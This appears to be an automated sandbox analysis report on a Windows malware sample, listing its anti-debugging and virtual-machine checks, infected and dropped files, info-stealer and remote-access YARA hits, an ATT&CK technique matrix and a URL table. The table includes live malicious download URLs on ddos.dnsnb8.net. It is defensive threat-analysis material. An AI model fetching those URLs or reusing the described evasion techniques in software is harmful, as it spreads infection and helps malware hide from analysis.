        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1052
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeAPI coverage: 9.8 %
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F41718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00F41754h1_2_00F41718
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00F429E2
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00F42B8C
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
        Source: Amcache.hve.1.drBinary or memory string: VMware
        Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Amcache.hve.1.drBinary or memory string: vmci.sys
        Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.1.drBinary or memory string: VMware20,1
        Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeAPI call chain: ExitProcess graph end nodegraph_0-77041
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeAPI call chain: ExitProcess graph end nodegraph_1-1027
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00485044 mov eax, dword ptr fs:[00000030h]0_2_00485044
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0061092B mov eax, dword ptr fs:[00000030h]0_2_0061092B
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00610D90 mov eax, dword ptr fs:[00000030h]0_2_00610D90
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0068EF83 push dword ptr fs:[00000030h]0_2_0068EF83
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0061E86C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0061E86C
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_0061D059 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0061D059
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_006271BA __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006271BA
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00622641 SetUnhandledExceptionFilter,0_2_00622641
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeMemory allocated: page read and write | page guardJump to behavior
        Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: GetLocaleInfoA,0_2_00417A20
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: GetLocaleInfoA,0_2_00627C70
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
        Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exeCode function: 1_2_00F4139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_00F4139F
        Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
        Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: IoUNtL.exe PID: 2920, type: MEMORYSTR
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe PID: 1220, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: IoUNtL.exe PID: 2920, type: MEMORYSTR
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe PID: 1220, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Masquerading
        11
        Input Capture
        11
        System Time Discovery
        1
        Taint Shared Content
        11
        Input Capture
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts2
        Process Injection
        1
        Virtualization/Sandbox Evasion
        LSASS Memory41
        Security Software Discovery
        Remote Desktop Protocol11
        Archive Collected Data
        11
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Disable or Modify Tools
        Security Account Manager1
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Access Token Manipulation
        NTDS2
        Process Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
        Process Injection
        LSA Secrets3
        File and Directory Discovery
        SSHKeylogging112
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
        Deobfuscate/Decode Files or Information
        Cached Domain Credentials24
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job32
        Software Packing
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        DLL Side-Loading
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe100%AviraW32/Jadtre.B
        FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
        C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
        C:\Users\user\AppData\Local\Temp\IoUNtL.exe100%AviraTR/Dldr.Small.Z.haljq
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
        C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\IoUNtL.exe100%Joe Sandbox ML
        C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://api.ip.sb/ip0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement0%URL Reputationsafe
        http://www.scintilla.org/scite.rng0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
        http://www.rftp.comJosiah0%URL Reputationsafe
        http://www.activestate.com0%URL Reputationsafe
        http://www.activestate.comHolger0%URL Reputationsafe
        http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
        http://tempuri.org/0%URL Reputationsafe
        http://upx.sf.net0%URL Reputationsafe
        http://www.rftp.com0%URL Reputationsafe
        http://www.baanboard.comBrendon0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%URL Reputationsafe
        https://www.smartsharesystems.com/0%URL Reputationsafe
        http://www.scintilla.org0%URL Reputationsafe
        http://www.spaceblue.comMathias0%URL Reputationsafe
        https://www.smartsharesystems.com/Morten0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2004/08/addressing/fault0%URL Reputationsafe
        http://www.develop.com0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
        http://www.lua.org0%URL Reputationsafe
        http://ddos.dnsnb8.net/100%URL Reputationmalware
        http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
        http://www.spaceblue.com0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm0%URL Reputationsafe
        http://www.baanboard.com0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage0%URL Reputationsafe
        http://www.develop.comDeepak0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence0%URL Reputationsafe
